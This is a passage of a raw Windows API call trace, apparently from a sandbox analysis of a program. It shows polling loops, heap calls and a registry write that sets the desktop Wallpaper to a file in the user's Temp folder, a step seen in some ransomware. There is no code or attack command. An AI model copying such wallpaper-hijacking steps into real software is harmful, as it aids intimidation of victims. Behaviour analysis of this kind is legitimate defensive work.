[0320.253] timeGetTime () returned 0x4fe79 [0320.253] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.253] Sleep (dwMilliseconds=0xa) [0320.268] timeGetTime () returned 0x4fe88 [0320.268] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.268] Sleep (dwMilliseconds=0xa) [0320.284] timeGetTime () returned 0x4fe98 [0320.284] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.284] Sleep (dwMilliseconds=0xa) [0320.300] timeGetTime () returned 0x4fea7 [0320.300] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.300] Sleep (dwMilliseconds=0xa) [0320.315] timeGetTime () returned 0x4feb7 [0320.315] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.315] Sleep (dwMilliseconds=0xa) [0320.331] timeGetTime () returned 0x4fec7 [0320.331] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.331] Sleep (dwMilliseconds=0xa) [0320.346] timeGetTime () returned 0x4fed6 [0320.346] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.346] Sleep (dwMilliseconds=0xa) [0320.362] timeGetTime () returned 0x4fee6 [0320.362] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.362] Sleep (dwMilliseconds=0xa) [0320.377] timeGetTime () returned 0x4fef5 [0320.378] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.378] Sleep (dwMilliseconds=0xa) [0320.393] timeGetTime () returned 0x4ff05 [0320.393] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.393] Sleep (dwMilliseconds=0xa) [0320.422] timeGetTime () returned 0x4ff15 [0320.422] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.422] Sleep (dwMilliseconds=0xa) [0320.424] timeGetTime () returned 0x4ff24 [0320.424] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.425] Sleep (dwMilliseconds=0xa) [0320.440] timeGetTime () returned 0x4ff34 [0320.440] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.440] Sleep (dwMilliseconds=0xa) [0320.456] timeGetTime () returned 0x4ff43 [0320.456] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.456] Sleep (dwMilliseconds=0xa) [0320.471] timeGetTime () returned 0x4ff53 [0320.471] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.471] Sleep (dwMilliseconds=0xa) [0320.487] timeGetTime () returned 0x4ff63 [0320.487] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.487] Sleep (dwMilliseconds=0xa) [0320.502] timeGetTime () returned 0x4ff72 [0320.502] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.502] Sleep (dwMilliseconds=0xa) [0320.518] timeGetTime () returned 0x4ff82 [0320.518] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.518] Sleep (dwMilliseconds=0xa) [0320.534] timeGetTime () returned 0x4ff91 [0320.534] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.534] Sleep (dwMilliseconds=0xa) [0320.549] timeGetTime () returned 0x4ffa1 [0320.549] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.549] Sleep (dwMilliseconds=0xa) [0320.565] timeGetTime () returned 0x4ffb1 [0320.565] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.565] Sleep (dwMilliseconds=0xa) [0320.580] timeGetTime () returned 0x4ffc0 [0320.580] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.580] Sleep (dwMilliseconds=0xa) [0320.596] timeGetTime () returned 0x4ffd0 [0320.596] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.596] Sleep (dwMilliseconds=0xa) [0320.612] timeGetTime () returned 0x4ffdf [0320.612] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.612] Sleep (dwMilliseconds=0xa) [0320.627] timeGetTime () returned 0x4ffef [0320.627] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.627] Sleep (dwMilliseconds=0xa) [0320.643] timeGetTime () returned 0x4ffff [0320.643] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.643] Sleep (dwMilliseconds=0xa) [0320.658] timeGetTime () returned 0x5000e [0320.658] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.659] Sleep (dwMilliseconds=0xa) [0320.674] timeGetTime () returned 0x5001e [0320.674] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.674] Sleep (dwMilliseconds=0xa) [0320.690] timeGetTime () returned 0x5002d [0320.690] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.690] Sleep (dwMilliseconds=0xa) [0320.705] timeGetTime () returned 0x5003d [0320.705] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.705] Sleep (dwMilliseconds=0xa) [0320.721] timeGetTime () returned 0x5004d [0320.721] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.721] Sleep (dwMilliseconds=0xa) [0320.736] timeGetTime () returned 0x5005c [0320.736] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.736] Sleep (dwMilliseconds=0xa) [0320.752] timeGetTime () returned 0x5006c [0320.752] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0320.752] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0320.752] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0320.752] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0320.752] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0320.753] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.753] Sleep (dwMilliseconds=0xa) [0320.768] timeGetTime () returned 0x5007b [0320.768] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.768] Sleep (dwMilliseconds=0xa) [0320.785] timeGetTime () returned 0x5008b [0320.785] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.785] Sleep (dwMilliseconds=0xa) [0320.799] timeGetTime () returned 0x5009b [0320.799] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.799] Sleep (dwMilliseconds=0xa) [0320.814] timeGetTime () returned 0x500aa [0320.814] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.814] Sleep (dwMilliseconds=0xa) [0320.830] timeGetTime () returned 0x500ba [0320.830] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.830] Sleep (dwMilliseconds=0xa) [0320.845] timeGetTime () returned 0x500c9 [0320.846] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.846] Sleep (dwMilliseconds=0xa) [0320.861] timeGetTime () returned 0x500d9 [0320.861] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.861] Sleep (dwMilliseconds=0xa) [0320.877] timeGetTime () returned 0x500e9 [0320.877] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.877] Sleep (dwMilliseconds=0xa) [0320.893] timeGetTime () returned 0x500f8 [0320.893] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.893] Sleep (dwMilliseconds=0xa) [0320.908] timeGetTime () returned 0x50108 [0320.908] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.908] Sleep (dwMilliseconds=0xa) [0320.924] timeGetTime () returned 0x50117 [0320.924] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.924] Sleep (dwMilliseconds=0xa) [0320.947] timeGetTime () returned 0x50127 [0320.947] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.947] Sleep (dwMilliseconds=0xa) [0320.959] timeGetTime () returned 0x50137 [0320.959] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.959] Sleep (dwMilliseconds=0xa) [0320.970] timeGetTime () returned 0x50146 [0320.971] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.971] Sleep (dwMilliseconds=0xa) [0320.986] timeGetTime () returned 0x50156 [0320.986] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.986] Sleep (dwMilliseconds=0xa) [0321.001] timeGetTime () returned 0x50165 [0321.002] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.002] Sleep (dwMilliseconds=0xa) [0321.017] timeGetTime () returned 0x50175 [0321.017] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.017] Sleep (dwMilliseconds=0xa) [0321.037] timeGetTime () returned 0x50185 [0321.037] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.037] Sleep (dwMilliseconds=0xa) [0321.048] timeGetTime () returned 0x50194 [0321.048] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.048] Sleep (dwMilliseconds=0xa) [0321.064] timeGetTime () returned 0x501a4 [0321.064] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.064] Sleep (dwMilliseconds=0xa) [0321.083] timeGetTime () returned 0x501b3 [0321.083] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0321.083] Sleep (dwMilliseconds=0xa) [0321.095] timeGetTime () returned 0x501c3 [0321.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0321.095] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0321.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0321.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0321.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0321.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0321.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0321.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0321.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0321.097] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0321.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0321.097] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0321.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0321.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0321.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0321.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0321.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0321.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0321.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0321.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0321.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0321.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0321.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0321.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0321.100] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0321.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0321.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0321.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0321.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0321.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0321.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0321.100] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0321.100] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0321.100] RegCloseKey (hKey=0x294) returned 0x0 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0321.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0321.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0321.102] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0321.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0321.102] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0321.102] 